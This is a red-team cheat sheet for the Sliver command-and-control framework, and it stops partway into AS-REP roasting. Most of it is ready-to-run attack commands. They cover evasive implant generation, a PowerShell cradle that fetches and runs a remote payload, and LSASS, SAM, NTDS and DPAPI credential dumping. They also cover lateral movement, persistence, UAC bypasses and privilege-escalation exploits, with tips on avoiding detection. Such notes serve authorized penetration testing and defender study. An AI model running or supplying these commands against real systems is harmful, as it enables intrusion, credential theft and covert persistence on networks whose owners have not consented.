Sliver C2 Notes#
Installation & Infrastructure Setup#
Server Installation#
Linux Installation (Recommended):
# Install via official installer
curl https://sliver.sh/install | sudo bash
# Or manual installation
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux -O /usr/local/bin/sliver-server
chmod +x /usr/local/bin/sliver-server
# Start server
sliver-server
# Start with systemd (persistence)
sudo systemctl enable sliver
sudo systemctl start sliver
OPSEC: Default installation directory is /root/.sliver/. Consider using non-standard paths. Enable TLS for all C2 listeners.
Multi-Operator Setup#
Generate operator configuration:
# On server - create operator profile
sliver > new-operator --name alice --lhost 192.168.1.100
# Transfer .sliver-client directory to operator
# Operator connects with:
sliver-client import /path/to/alice_*.cfg
# Or connect directly
sliver-client -c /path/to/config.cfg
OPSEC: Use unique operator names tied to engagement. Rotate operator certificates between operations.
C2 Configuration & Profiles#
HTTP/HTTPS Listeners#
Basic HTTPS Listener:
# Generate HTTPS C2 profile
sliver > https --lhost 0.0.0.0 --lport 443 --domain cdn.example.com
# With custom certificate
sliver > https --lhost 0.0.0.0 --lport 443 --cert /path/to/cert.pem --key /path/to/key.pem
# List active listeners
sliver > jobs
# Close listener
sliver > jobs -k <job_id>
Custom HTTP(S) C2 Profiles:
# Create custom C2 profile
sliver > c2profile import /path/to/profile.json
# Example profile structure (profile.json)
{
"name": "custom-https",
"implant_config": {
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"url_parameters": ["id", "session"],
"headers": [
{"name": "X-Request-ID", "value": "{{.RandomString 16}}"},
{"name": "Accept-Language", "value": "en-US,en;q=0.9"}
],
"max_body_length": 2048576,
"min_poll_interval": "30s",
"max_poll_interval": "60s",
"jitter": 30
}
}
# Start with custom profile
sliver > https --lhost 0.0.0.0 --lport 443 --website /path/to/website --c2profile custom-https
OPSEC: Use domain fronting, valid certificates, realistic User-Agents. Implement jitter (30-50%). Avoid default paths/URIs.
DNS C2#
DNS Listener Setup:
# Start DNS listener (requires DNS configuration)
sliver > dns --domains target.com --canaries false
# Multi-domain DNS
sliver > dns --domains target.com,cdn.target.com,api.target.com --no-canaries
# DNS over HTTPS (DoH)
sliver > dns --domains target.com --doh-provider cloudflare
DNS Configuration Requirements:
# DNS A record pointing to team server
target.com. IN A 192.168.1.100
# NS record delegation
_sliver.target.com. IN NS ns1.target.com.
ns1.target.com. IN A 192.168.1.100
OPSEC: DNS is slower but works through most firewalls. Use legitimate-looking subdomains. Disable canaries in production.
mTLS Listeners#
Mutual TLS C2:
# Start mTLS listener (most covert, requires direct connectivity)
sliver > mtls --lhost 0.0.0.0 --lport 8888
# Generate implant with mTLS only
sliver > generate --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe --save /tmp
OPSEC: mTLS is fastest and most secure. Appears as standard TLS traffic. Requires direct connectivity (no proxies). Best for LAN pivoting.
WireGuard C2#
WireGuard VPN Tunnel:
# Start WireGuard listener
sliver > wg --lport 53 --timeout 30s
# Generates encrypted VPN tunnel
# Appears as UDP traffic on port 53 (DNS-like)
OPSEC: WireGuard provides full VPN functionality. Excellent for long-term access. Can tunnel other tools. Traffic analysis may detect non-DNS patterns.
Payload Generation & Delivery#
Implant Generation#
Windows Executables:
# Basic EXE
sliver > generate --http 192.168.1.100:443 --os windows --arch amd64 --format exe --save /tmp/
# With evasion
sliver > generate --http 192.168.1.100:443 --os windows --arch amd64 \
--format exe --skip-symbols --obfuscate --debug false --evasion --save /tmp/
# Beacon mode (vs. interactive session)
sliver > generate beacon --http 192.168.1.100:443 --seconds 60 --jitter 30 \
--os windows --arch amd64 --save /tmp/
# Service binary
sliver > generate --http 192.168.1.100:443 --os windows --arch amd64 \
--format service --save /tmp/
Shellcode Generation:
# Raw shellcode
sliver > generate --http 192.168.1.100:443 --os windows --arch amd64 --format shellcode
# Shellcode for injection frameworks
sliver > generate --http 192.168.1.100:443 --os windows --format shellcode --save /tmp/implant.bin
# Use with Donut, sRDI, or custom loaders
DLL Implants:
# Reflective DLL
sliver > generate --http 192.168.1.100:443 --os windows --arch amd64 --format shared
# With specific export
sliver > generate --http 192.168.1.100:443 --os windows --arch amd64 \
--format shared --export-name DllMain
# Side-loading DLL (rename to match target)
sliver > generate --http 192.168.1.100:443 --os windows --format shared \
--export-name version.dll
Linux/macOS Implants:
# Linux ELF
sliver > generate --http 192.168.1.100:443 --os linux --arch amd64 --format elf
# macOS Mach-O
sliver > generate --http 192.168.1.100:443 --os mac --arch amd64 --format macho
OPSEC: Always use --skip-symbols --obfuscate --evasion for operational implants. Avoid default names. Test against target AV before deployment.
Stagers & Loaders#
MSFVenom Stager:
# Generate stager shellcode
sliver > generate stager --lhost 192.168.1.100 --lport 443 --protocol http --arch amd64 --format c
# Use with MSFVenom
msfvenom -p - -a x64 --platform windows -f exe -o stager.exe < /tmp/STAGER.bin
PowerShell Loader:
# Generate PowerShell cradle
sliver > generate --http 192.168.1.100:443 --os windows --format shellcode --save /tmp/
# Host shellcode
sliver > websites add-content --website mysite --web-path /updates --content /tmp/BINARY.bin
# PowerShell download cradle
$wc = New-Object System.Net.WebClient;
$wc.Headers.Add("User-Agent","Mozilla/5.0");
$bytes = $wc.DownloadData("https://cdn.example.com/updates");
[System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, $null)
OPSEC: Stage large implants to reduce initial payload size. Encrypt stagers. Use HTTPS for staging. Detect sandbox/analysis before staging.
External C2 Integration#
Redirectors & Forwarders:
# Setup NGINX redirector (on VPS)
upstream backend {
server 192.168.1.100:443;
}
server {
listen 443 ssl;
server_name cdn.example.com;
ssl_certificate /path/to/cert.pem;
ssl_certificate_key /path/to/key.pem;
location / {
proxy_pass https://backend;
proxy_ssl_verify off;
}
}
# Point implants to redirector
sliver > generate --http cdn.example.com:443 --os windows
OPSEC: Use multiple redirectors with geographic diversity. Implement domain fronting. Allowlist team server IPs on redirector.
Session Management#
Session vs. Beacon#
Session Mode: Interactive, real-time connection
# Generate interactive session
sliver > generate --http 192.168.1.100:443 --os windows --save /tmp/
# Once implant executed
sliver > sessions
# Interact with session
sliver > use <session_id>
sliver (SESSION_NAME) > info
Beacon Mode: Low & slow, asynchronous callbacks
# Generate beacon (60s callback, 30% jitter)
sliver > generate beacon --http 192.168.1.100:443 --seconds 60 --jitter 30 --os windows
# List beacons
sliver > beacons
# Interact with beacon
sliver > use <beacon_id>
# Tasks queue until next check-in
sliver (BEACON_NAME) > ls
sliver (BEACON_NAME) > tasks
# View completed tasks
sliver (BEACON_NAME) > tasks fetch
OPSEC: Use beacon mode for long-term operations. Adjust callback interval based on target monitoring (60-300s recommended). Increase jitter (30-50%).
Session Commands#
Interactive Session:
# Background session
sliver (SESSION) > background
# Switch sessions
sliver > use <session_id>
# Session info
sliver (SESSION) > info
sliver (SESSION) > ifconfig
sliver (SESSION) > netstat
# Process management
sliver (SESSION) > ps
sliver (SESSION) > ps -T # Tree view
sliver (SESSION) > ps -e # Filter by name
# Kill session
sliver > sessions -k <session_id>
# Interactive shell
sliver (SESSION) > shell
sliver (SESSION) > powershell
sliver (SESSION) > execute <command>
OPSEC: Avoid interactive sessions in high-security environments. Background sessions when not actively using. Monitor for behavioral detections.
Host Reconnaissance#
System Enumeration#
Basic Host Information:
sliver (SESSION) > info
sliver (SESSION) > getpid
sliver (SESSION) > whoami
sliver (SESSION) > getuid
sliver (SESSION) > getgid
# System details
sliver (SESSION) > execute systeminfo
sliver (SESSION) > execute hostname
sliver (SESSION) > execute ver
# Environment variables
sliver (SESSION) > execute set
# Installed software
sliver (SESSION) > execute wmic product get name,version
sliver (SESSION) > execute reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall
# Running processes
sliver (SESSION) > ps
sliver (SESSION) > ps -T # Tree view
# Network connections
sliver (SESSION) > netstat
sliver (SESSION) > ifconfig
OPSEC: Limit enumeration commands. Use built-in Sliver commands over execute when possible (less suspicious). Commands via execute spawn cmd.exe (Event ID 4688).
User & Group Enumeration#
Local Users:
sliver (SESSION) > execute net user
sliver (SESSION) > execute net localgroup administrators
sliver (SESSION) > execute whoami /all
sliver (SESSION) > execute whoami /priv
# Query specific user
sliver (SESSION) > execute net user <username>
sliver (SESSION) > execute net user <username> /domain
# Recently logged users
sliver (SESSION) > execute query user
sliver (SESSION) > execute qwinsta
Domain Enumeration:
# Domain info
sliver (SESSION) > execute net config workstation
sliver (SESSION) > execute systeminfo | findstr Domain
# Domain users/groups
sliver (SESSION) > execute net user /domain
sliver (SESSION) > execute net group "Domain Admins" /domain
sliver (SESSION) > execute net group "Enterprise Admins" /domain
# Domain controllers
sliver (SESSION) > execute nltest /dclist:<domain>
sliver (SESSION) > execute nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
OPSEC: Domain enumeration queries DC and generates logs (Event ID 4662). Use PowerView/SharpView extensions for stealthier enumeration.
File System Operations#
File Navigation:
sliver (SESSION) > cd C:\Users\Public
sliver (SESSION) > pwd
sliver (SESSION) > ls
sliver (SESSION) > ls -l # Detailed listing
# Recursive listing
sliver (SESSION) > execute dir /s /b C:\Users
# Find files
sliver (SESSION) > execute where /r C:\ *.kdbx
sliver (SESSION) > execute dir /s /b C:\Users\*password*.txt
File Operations:
# Download files
sliver (SESSION) > download C:\Users\Administrator\Desktop\secrets.txt /tmp/
# Upload files
sliver (SESSION) > upload /tmp/tool.exe C:\Windows\Temp\svchost.exe
# View file contents
sliver (SESSION) > cat C:\Windows\System32\drivers\etc\hosts
# Delete files
sliver (SESSION) > rm C:\Windows\Temp\malware.exe
# Create directory
sliver (SESSION) > mkdir C:\Windows\Temp\updates
OPSEC: File operations generate Event ID 4663 (file access) and AV scans. Avoid obvious paths. Download only necessary files. Hash files before download to verify integrity.
Screenshot & Keylogging#
Screenshots:
sliver (SESSION) > screenshot
sliver (SESSION) > screenshot --loot # Auto-save to loot directory
Keylogging:
# Start keylogger
sliver (SESSION) > keylogger start
# Dump captured keystrokes
sliver (SESSION) > keylogger dump
# Stop keylogger
sliver (SESSION) > keylogger stop
OPSEC: Screenshots and keyloggers are highly invasive. Obtain authorization. Monitor for EDR behavioral detection. Keyloggers hook keyboard APIs (suspicious).
Credential Access#
LSASS Dumping#
Direct LSASS Access:
# Dump LSASS (requires high integrity)
sliver (SESSION) > procdump -n lsass.exe -s lsass.dmp
# Download dump
sliver (SESSION) > download lsass.dmp /tmp/
# Parse offline with Mimikatz/pypykatz
pypykatz lsa minidump lsass.dmp
# Alternative: Load Mimikatz extension
sliver (SESSION) > load /path/to/mimikatz.dll
sliver (SESSION) > mimikatz sekurlsa::minidump lsass.dmp
sliver (SESSION) > mimikatz sekurlsa::logonPasswords
EDR Evasion - Indirect Dumping:
# Use comsvcs.dll method
sliver (SESSION) > execute rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass_pid> C:\Windows\Temp\dump.bin full
# Use ProcDump (if Sysinternals accepted)
sliver (SESSION) > upload procdump.exe C:\Windows\Temp\
sliver (SESSION) > execute C:\Windows\Temp\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
OPSEC: LSASS access triggers EDR alerts (Event ID 4656, handle to LSASS). Use PPL bypass or kernel exploits if needed. Dump remotely via Task Manager or WerFault.exe cloning.
Mimikatz Integration#
Load Mimikatz Extension:
# Load Mimikatz BOF
sliver (SESSION) > armory install mimikatz
sliver (SESSION) > mimikatz
# Common Mimikatz commands
sliver (SESSION) > mimikatz privilege::debug
sliver (SESSION) > mimikatz sekurlsa::logonpasswords
sliver (SESSION) > mimikatz sekurlsa::tickets
sliver (SESSION) > mimikatz lsadump::sam
sliver (SESSION) > mimikatz lsadump::secrets
sliver (SESSION) > mimikatz lsadump::cache
Kerberos Ticket Operations:
# Dump tickets
sliver (SESSION) > mimikatz sekurlsa::tickets /export
# Pass-the-Ticket
sliver (SESSION) > mimikatz kerberos::ptt ticket.kirbi
# Golden Ticket
sliver (SESSION) > mimikatz kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt
# Silver Ticket
sliver (SESSION) > mimikatz kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /target:dc01.corp.local /service:cifs /rc4:<hash> /ptt
OPSEC: Loading Mimikatz in-memory is signature-heavy. Use BOF version. Obfuscate Mimikatz strings. Consider SharpKatz or alternatives.
SAM/NTDS Dumping#
Local SAM Database:
# Dump SAM (requires SYSTEM)
sliver (SESSION) > execute reg save HKLM\SAM C:\Windows\Temp\sam.hiv
sliver (SESSION) > execute reg save HKLM\SECURITY C:\Windows\Temp\security.hiv
sliver (SESSION) > execute reg save HKLM\SYSTEM C:\Windows\Temp\system.hiv
# Download and parse
sliver (SESSION) > download C:\Windows\Temp\sam.hiv /tmp/
sliver (SESSION) > download C:\Windows\Temp\security.hiv /tmp/
sliver (SESSION) > download C:\Windows\Temp\system.hiv /tmp/
# Parse with secretsdump
impacket-secretsdump -sam sam.hiv -security security.hiv -system system.hiv LOCAL
NTDS.dit Extraction (Domain Controller):
# Method 1: VSS Shadow Copy
sliver (SESSION) > execute vssadmin create shadow /for=C:
sliver (SESSION) > execute copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit
sliver (SESSION) > execute copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\SYSTEM
# Method 2: NTDSUtil
sliver (SESSION) > shell
C:\> ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\dump" q q
# Download and parse
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
OPSEC: SAM/NTDS dumping is noisy (Event IDs 4661, 4662). Requires high privileges. Shadow copies may trigger alerts. Consider DCSync as alternative.
DCSync Attack#
Replicate Domain Credentials:
# Use Mimikatz DCSync
sliver (SESSION) > mimikatz lsadump::dcsync /domain:corp.local /user:Administrator
sliver (SESSION) > mimikatz lsadump::dcsync /domain:corp.local /all
# Or use SharpKatz extension
sliver (SESSION) > execute-assembly /path/to/SharpKatz.exe --Command dcsync --User Administrator --Domain corp.local
# Requires: Replicating Directory Changes (DS-Replication-Get-Changes)
# Replicating Directory Changes All (DS-Replication-Get-Changes-All)
OPSEC: DCSync generates Event ID 4662 (DS-Replication-Get-Changes). Requires DA or equivalent. Appears as legitimate DC replication. No LSASS interaction needed.
DPAPI Credentials#
Decrypt DPAPI Blobs:
# Dump DPAPI masterkeys
sliver (SESSION) > mimikatz sekurlsa::dpapi
# Decrypt Chrome passwords
sliver (SESSION) > mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data"
# Decrypt credential files
sliver (SESSION) > mimikatz dpapi::cred /in:"C:\Users\user\AppData\Roaming\Microsoft\Credentials\<GUID>"
OPSEC: DPAPI decryption requires user context or SYSTEM. Access to DPAPI keys enables decryption of passwords, certificates, keys.
Lateral Movement & Pivoting#
Pivoting Setup#
SOCKS Proxy:
# Start SOCKS5 proxy
sliver (SESSION) > socks5 start
# View SOCKS info
sliver > socks5
# Configure proxychains
$ sudo vim /etc/proxychains4.conf
[ProxyList]
socks5 127.0.0.1 1081
# Use with tools
$ proxychains crackmapexec smb 10.10.20.0/24
$ proxychains nmap -sT -Pn 10.10.20.10
# Stop proxy
sliver (SESSION) > socks5 stop
Port Forwarding:
# Forward remote port to local
sliver (SESSION) > portfwd add --remote 10.10.20.10:445 --bind 127.0.0.1:8445
# Access forwarded service
$ smbclient -L 127.0.0.1 -p 8445
# List forwarders
sliver (SESSION) > portfwd
# Remove forwarder
sliver (SESSION) > portfwd rm --id <fwd_id>
Reverse Port Forward:
# Forward local port to remote network
sliver (SESSION) > rportfwd add --remote 0.0.0.0:8080 --bind 127.0.0.1:80
# Useful for hosting payloads internally
OPSEC: SOCKS proxies can be slow. Use mTLS sessions for pivoting (faster). Monitor bandwidth. Tunnel only necessary traffic.
WMI Execution#
Remote WMI Commands:
# Execute command via WMI
sliver (SESSION) > execute wmic /node:"10.10.20.10" /user:"CORP\admin" /password:"Pass123" process call create "cmd.exe /c powershell -Command <payload>"
# With uploaded tool
sliver (SESSION) > upload /tmp/implant.exe \\10.10.20.10\C$\Windows\Temp\svchost.exe
sliver (SESSION) > execute wmic /node:"10.10.20.10" /user:"CORP\admin" /password:"Pass123" process call create "C:\Windows\Temp\svchost.exe"
OPSEC: WMI execution generates Event ID 4688 (process creation) on target. Parent process is WmiPrvSE.exe. Consider using encoded payloads. Network authentication required.
PsExec-Style Execution#
SMB-Based Execution:
# Upload implant
sliver (SESSION) > upload /tmp/implant.exe \\10.10.20.10\ADMIN$\Temp\update.exe
# Create service
sliver (SESSION) > execute sc \\10.10.20.10 create UpdateService binPath= "C:\Windows\Temp\update.exe" start= auto
sliver (SESSION) > execute sc \\10.10.20.10 start UpdateService
# Cleanup
sliver (SESSION) > execute sc \\10.10.20.10 stop UpdateService
sliver (SESSION) > execute sc \\10.10.20.10 delete UpdateService
OPSEC: Service creation generates Event IDs 7045, 7036. Use random service names. Clean up services. Consider fileless alternatives.
WinRM Execution#
Remote PowerShell via WinRM:
# Test WinRM connectivity
sliver (SESSION) > execute winrs -r:10.10.20.10 -u:CORP\admin -p:Pass123 hostname
# Execute PowerShell
sliver (SESSION) > execute winrs -r:10.10.20.10 -u:CORP\admin -p:Pass123 powershell -Command "<payload>"
# Transfer and execute implant
sliver (SESSION) > execute winrs -r:10.10.20.10 -u:CORP\admin -p:Pass123 "powershell IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/implant.ps1')"
OPSEC: WinRM requires TCP 5985/5986. Generates Event ID 4688. PowerShell logs (Event ID 4104) if ScriptBlock logging enabled. Use obfuscation.
Pass-the-Hash#
NTLM Authentication:
# Use Mimikatz to inject hash
sliver (SESSION) > mimikatz sekurlsa::pth /user:Administrator /domain:CORP /ntlm:<hash> /run:"cmd.exe"
# Then from spawned cmd.exe
sliver (SESSION) > shell
C:\> dir \\dc01\C$
# Or use with Impacket (via SOCKS)
$ proxychains impacket-psexec -hashes :<ntlm_hash> CORP/Administrator@10.10.20.10
OPSEC: PtH generates Event ID 4624 (logon type 3). NTLM authentication is noisy in Kerberos environments. AES keys preferred.
Kerberos Attacks#
Pass-the-Ticket:
# Export tickets from memory
sliver (SESSION) > mimikatz sekurlsa::tickets /export
# Inject ticket
sliver (SESSION) > mimikatz kerberos::ptt ticket.kirbi
# Use ticket
sliver (SESSION) > execute klist
sliver (SESSION) > execute dir \\dc01\C$
Overpass-the-Hash:
# Request TGT using NTLM hash
sliver (SESSION) > mimikatz sekurlsa::pth /user:Administrator /domain:CORP /ntlm:<hash> /run:powershell
# Now have TGT in memory
sliver (SESSION) > execute klist
OPSEC: Kerberos attacks generate Event IDs 4768 (TGT request), 4769 (TGS request), 4624 (logon). Use realistic ticket lifetimes.
Persistence Mechanisms#
Registry Autorun#
Run Keys:
# HKCU Run key (user-level)
sliver (SESSION) > execute reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "C:\Users\Public\update.exe" /f
# HKLM Run key (system-level, requires elevation)
sliver (SESSION) > execute reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\Temp\svchost.exe" /f
# RunOnce keys (executes once then deletes)
sliver (SESSION) > execute reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "Init" /t REG_SZ /d "C:\Users\Public\init.exe" /f
OPSEC: Run keys are well-monitored (Autoruns, Event ID 13 for registry modification). Use obscure names. Consider alternate persistence methods.
Scheduled Tasks#
Create Scheduled Task:
# Daily task at logon
sliver (SESSION) > execute schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\update.exe" /sc onlogon /ru SYSTEM /f
# Hourly task
sliver (SESSION) > execute schtasks /create /tn "SystemCheck" /tr "C:\Windows\System32\svchost.exe" /sc hourly /mo 1 /ru SYSTEM /f
# Task with specific time
sliver (SESSION) > execute schtasks /create /tn "Update" /tr "powershell.exe -WindowStyle Hidden -Command <payload>" /sc daily /st 09:00 /ru SYSTEM /f
# Hidden task (disable history)
sliver (SESSION) > execute schtasks /create /tn "Microsoft\Windows\MemoryDiagnostic\Check" /tr "C:\Windows\Temp\check.exe" /sc onlogon /ru SYSTEM /rl HIGHEST /f
# Verify task
sliver (SESSION) > execute schtasks /query /tn "WindowsUpdate"
# Delete task
sliver (SESSION) > execute schtasks /delete /tn "WindowsUpdate" /f
OPSEC: Task creation generates Event ID 4698. Use Windows subdirectories for task names (blends in). Avoid obvious triggers. Tasks survive reboots.
Windows Services#
Create Service:
# Service-based persistence
sliver (SESSION) > execute sc create "WindowsUpdate" binPath= "C:\Windows\System32\update.exe" start= auto
sliver (SESSION) > execute sc description "WindowsUpdate" "Manages system updates"
sliver (SESSION) > execute sc start "WindowsUpdate"
# Service with failure recovery
sliver (SESSION) > execute sc failure "WindowsUpdate" reset= 86400 actions= restart/60000/restart/60000/restart/60000
# Query service
sliver (SESSION) > execute sc query "WindowsUpdate"
# Delete service
sliver (SESSION) > execute sc stop "WindowsUpdate"
sliver (SESSION) > execute sc delete "WindowsUpdate"
DLL Hijacking Service:
# Find vulnerable service
sliver (SESSION) > execute sc qc <service_name>
# Replace DLL in service path
sliver (SESSION) > upload /tmp/malicious.dll C:\VulnerableApp\version.dll
# Restart service
sliver (SESSION) > execute sc stop <service_name>
sliver (SESSION) > execute sc start <service_name>
OPSEC: Service creation generates Event IDs 7045, 4697. Use legitimate-sounding names. Services require SYSTEM/Admin privileges. Persist through reboots.
WMI Event Subscriptions#
Permanent WMI Event:
# Create event filter (trigger)
sliver (SESSION) > execute wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="SystemFilter", EventNamespace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
# Create event consumer (action)
sliver (SESSION) > execute wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="SystemConsumer", CommandLineTemplate="C:\Windows\System32\update.exe"
# Bind filter to consumer
sliver (SESSION) > execute wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name='SystemFilter'", Consumer="CommandLineEventConsumer.Name='SystemConsumer'"
# Verify
sliver (SESSION) > execute wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET /FORMAT:list
# Remove persistence
sliver (SESSION) > execute wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="SystemFilter" DELETE
sliver (SESSION) > execute wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="SystemConsumer" DELETE
sliver (SESSION) > execute wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='SystemFilter'" DELETE
OPSEC: WMI persistence is stealthy and survives reboots. Rarely monitored. Event IDs 5857-5861. Requires Administrator. Hard to detect without specialized tools.
Startup Folder#
User Startup:
# Copy to user startup folder
sliver (SESSION) > upload /tmp/implant.exe "C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDriveSync.exe"
# All users startup (requires admin)
sliver (SESSION) > upload /tmp/implant.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SecurityUpdate.exe"
OPSEC: Startup folder is heavily monitored. Use realistic names. Easy to detect with Autoruns. Consider for low-security targets only.
COM Hijacking#
Registry Hijack:
# Identify COM object to hijack
sliver (SESSION) > execute reg query "HKCU\Software\Classes\CLSID" /s /f "InprocServer32"
# Hijack COM object
sliver (SESSION) > execute reg add "HKCU\Software\Classes\CLSID\{GUID}\InprocServer32" /ve /t REG_SZ /d "C:\Users\Public\evil.dll" /f
# Trigger on application launch
OPSEC: COM hijacking is advanced and stealthy. Requires specific application launching hijacked object. Difficult to detect. Test thoroughly before deployment.
Privilege Escalation#
Token Manipulation#
Steal Token:
# List processes with tokens
sliver (SESSION) > ps
# Steal token from elevated process
sliver (SESSION) > steal-token <pid>
# Verify new token
sliver (SESSION) > getuid
sliver (SESSION) > whoami
# Revert to original token
sliver (SESSION) > revert-to-self
OPSEC: Token theft requires SeDebugPrivilege. Generates Event ID 4673. Stolen tokens inherit privileges. Use tokens from SYSTEM processes.
UAC Bypass#
FodHelper Bypass (Windows 10):
# Set registry keys
sliver (SESSION) > execute reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /t REG_SZ /d "C:\Windows\Temp\implant.exe" /f
sliver (SESSION) > execute reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f
# Trigger UAC bypass
sliver (SESSION) > execute fodhelper.exe
# Cleanup
sliver (SESSION) > execute reg delete "HKCU\Software\Classes\ms-settings" /f
EventVwr Bypass:
sliver (SESSION) > execute reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "C:\Windows\Temp\implant.exe" /f
sliver (SESSION) > execute eventvwr.exe
sliver (SESSION) > execute reg delete "HKCU\Software\Classes\mscfile" /f
OPSEC: UAC bypasses work on default UAC settings. Generates Event ID 4688 (process creation). Most bypasses patched regularly. Test before use.
Kernel Exploits#
Exploit Suggestions:
# Check system version
sliver (SESSION) > execute systeminfo
# Common exploits:
# - MS16-032 (Secondary Logon Handle)
# - CVE-2021-1675/CVE-2021-34527 (PrintNightmare)
# - CVE-2021-36934 (HiveNightmare/SeriousSAM)
# Upload compiled exploit
sliver (SESSION) > upload /tmp/exploit.exe C:\Windows\Temp\update.exe
sliver (SESSION) > execute C:\Windows\Temp\update.exe
OPSEC: Kernel exploits can cause system instability. Test in lab first. May trigger EDR behavioral detection. Use as last resort.
PrintNightmare (CVE-2021-1675)#
Exploit Print Spooler:
# Check if vulnerable
sliver (SESSION) > execute Get-PrinterDriver
# Upload SharpPrintNightmare
sliver (SESSION) > upload /tmp/SharpPrintNightmare.exe C:\Windows\Temp\
sliver (SESSION) > execute C:\Windows\Temp\SharpPrintNightmare.exe C:\Windows\Temp\implant.dll
# Or use Mimikatz
sliver (SESSION) > mimikatz misc::printnightmare /server:127.0.0.1 /library:\\192.168.1.100\share\evil.dll
OPSEC: PrintNightmare heavily monitored post-patch. Event IDs 316, 808. Requires Print Spooler running. Patches available since July 2021.
Potato Exploits#
JuicyPotato / RoguePotato:
# Service account to SYSTEM
sliver (SESSION) > upload /tmp/JuicyPotato.exe C:\Windows\Temp\
sliver (SESSION) > execute C:\Windows\Temp\JuicyPotato.exe -l 1337 -p C:\Windows\Temp\implant.exe -t * -c {CLSID}
# RoguePotato (works on Server 2019)
sliver (SESSION) > upload /tmp/RoguePotato.exe C:\Windows\Temp\
sliver (SESSION) > execute C:\Windows\Temp\RoguePotato.exe -r 192.168.1.100 -l 9999 -e "C:\Windows\Temp\implant.exe"
OPSEC: Potato exploits abuse NTLM relay to localhost. Requires service account context. Generates network authentication logs. Works on older Windows versions.
Domain Dominance#
Active Directory Enumeration#
PowerView Integration:
# Load PowerView
sliver (SESSION) > execute-assembly /path/to/SharpView.exe
# Domain info
sliver (SESSION) > execute-assembly SharpView.exe Get-Domain
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainController
# Users
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainUser
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainUser -Identity Administrator
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainUser -SPN
# Groups
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainGroup
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainGroupMember -Identity "Domain Admins"
# Computers
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainComputer
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainComputer -OperatingSystem "*Server*"
# Trust relationships
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainTrust
sliver (SESSION) > execute-assembly SharpView.exe Get-ForestTrust
# ACLs
sliver (SESSION) > execute-assembly SharpView.exe Get-ObjectAcl -Identity "Domain Admins"
sliver (SESSION) > execute-assembly SharpView.exe Find-InterestingDomainAcl
BloodHound Data Collection:
# Upload SharpHound
sliver (SESSION) > upload /tmp/SharpHound.exe C:\Windows\Temp\
# Run collection
sliver (SESSION) > execute C:\Windows\Temp\SharpHound.exe -c All --zipfilename corp_audit.zip
sliver (SESSION) > execute C:\Windows\Temp\SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\Windows\Temp
# Download results
sliver (SESSION) > download C:\Windows\Temp\*_BloodHound.zip /tmp/
# Cleanup
sliver (SESSION) > rm C:\Windows\Temp\SharpHound.exe
sliver (SESSION) > rm C:\Windows\Temp\*_BloodHound.zip
OPSEC: AD enumeration generates LDAP queries (Event ID 4662). High volume queries are suspicious. Use stealth collection options. Avoid non-domain-joined hosts for enumeration.
Kerberoasting#
Request Service Tickets:
# Using Rubeus
sliver (SESSION) > execute-assembly /path/to/Rubeus.exe kerberoast /outfile:tickets.txt
# Request specific SPN
sliver (SESSION) > execute-assembly Rubeus.exe kerberoast /user:sqlservice /outfile:sqlsvc.txt
# Download tickets
sliver (SESSION) > download C:\Windows\Temp\tickets.txt /tmp/
# Crack with Hashcat
$ hashcat -m 13100 tickets.txt /usr/share/wordlists/rockyou.txt --force
# Alternative: Using PowerShell
sliver (SESSION) > execute-assembly /path/to/GetUserSPNs.exe
OPSEC: Kerberoasting generates Event ID 4769 (TGS request) with RC4 encryption. Appears legitimate. Minimal detection risk. Service accounts often have weak passwords.
AS-REP Roasting#
Target Users Without Kerberos Pre-Authentication:
# Enumerate vulnerable users
sliver (SESSION) > execute-assembly Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
